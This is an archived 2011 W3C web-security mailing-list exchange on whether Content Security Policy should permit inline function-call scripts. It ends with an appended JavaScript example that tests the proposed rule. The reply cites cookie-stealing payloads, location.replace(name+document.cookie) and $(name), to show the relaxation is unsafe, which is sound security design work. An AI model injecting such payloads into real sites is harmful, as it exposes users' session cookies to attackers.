- From: <sird@rckc.at>
- Date: Wed, 23 Feb 2011 22:45:13 -0800
- To: Devdatta Akhawe <dev.akhawe@gmail.com>
- Cc: public-web-security@w3.org
Hmm, that's still bad, right? location.replace(name+document.cookie), for example. If you wish to keep CSP safe, don't allow this =/

Greetz!!

PS. Even if it's only users' functions, something like $(name) in a page with jQuery is enough.

--
Eduardo

On Wed, Feb 23, 2011 at 7:52 PM, Devdatta Akhawe <dev.akhawe@gmail.com> wrote:
> Hi
>
> CSP currently blocks all inline scripts and we have seen a lot of
> discussion about it.
>
> Have we considered only allowing inline function calls as an option --
> a middle ground between inline scripts being enabled and disabled, i.e.
>
> <script> function(arg1,arg2,arg3) </script>
>
> will be allowed inline; no other inline script execution will be
> allowed. You still won't be able to do <script> .. javascript ... </script>.
>
> The CSP spec at Mozilla
> (https://wiki.mozilla.org/Security/CSP/Specification) already makes a
> distinction between arbitrary code being eval'ed and function calls.
> For example, setTimeout is allowed with function names as arguments
> but not with strings. It seems this is similar.
>
> I feel like this simple change will make retrofitting legacy
> applications with CSP much easier.
>
> My apologies if this has already been proposed. It would be great if
> someone can point me to the discussion.
>
> cheers
> devdatta
Received on Thursday, 24 February 2011 06:46:06 UTC
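As an added example that is not part of either message: the proposed "inline function calls only" relaxation modelled as a syntactic check, run over the snippets cited in the reply. The regular expression and the allowlist of page-defined functions are constructed assumptions for illustration.

```javascript
// Added example, not code from the thread. Models the proposed CSP relaxation
// ("an inline script may only be a single function call") as a syntactic check
// and evaluates it against the snippets quoted in the reply. The regular
// expression and the page-function allowlist are constructed assumptions.

const IDENT = "[A-Za-z_$][\\w$]*";
// One call `callee(args)` and nothing else; the argument list may not
// contain parentheses, so a second call cannot be smuggled in.
const CALL_ONLY = new RegExp(
  `^\\s*(${IDENT}(?:\\.${IDENT})*)\\s*\\(([^()]*)\\)\\s*;?\\s*$`
);

// Rule 1: the proposal as stated, a bare "it is a function call" check.
function allowedByCallOnlyRule(src) {
  return CALL_ONLY.test(src);
}

// Rule 2: the narrower reading in the PS, only functions the page itself
// defines (constructed allowlist: a page helper plus jQuery's `$`).
const PAGE_FUNCTIONS = new Set(["initPage", "$"]);

function allowedByUserFunctionRule(src) {
  const m = CALL_ONLY.exec(src);
  return m !== null && PAGE_FUNCTIONS.has(m[1]);
}

// Constructed inline scripts: one benign, and the two cited in the reply.
// `name` is window.name, which a page that opens or frames this one can set.
const SAMPLES = {
  benign: "initPage('home', 3)",
  cookieLeak: "location.replace(name+document.cookie)",
  jqueryName: "$(name)",
};

// Returns, per sample, whether each rule would let the script run.
function evaluateRules() {
  const out = {};
  for (const [label, src] of Object.entries(SAMPLES)) {
    out[label] = {
      callOnly: allowedByCallOnlyRule(src),
      userFunctions: allowedByUserFunctionRule(src),
    };
  }
  return out;
}
```

Rule 1 admits the cookie-leaking call because nothing constrains the argument expression; rule 2 rejects it but still admits `$(name)`, which is the point of the PS.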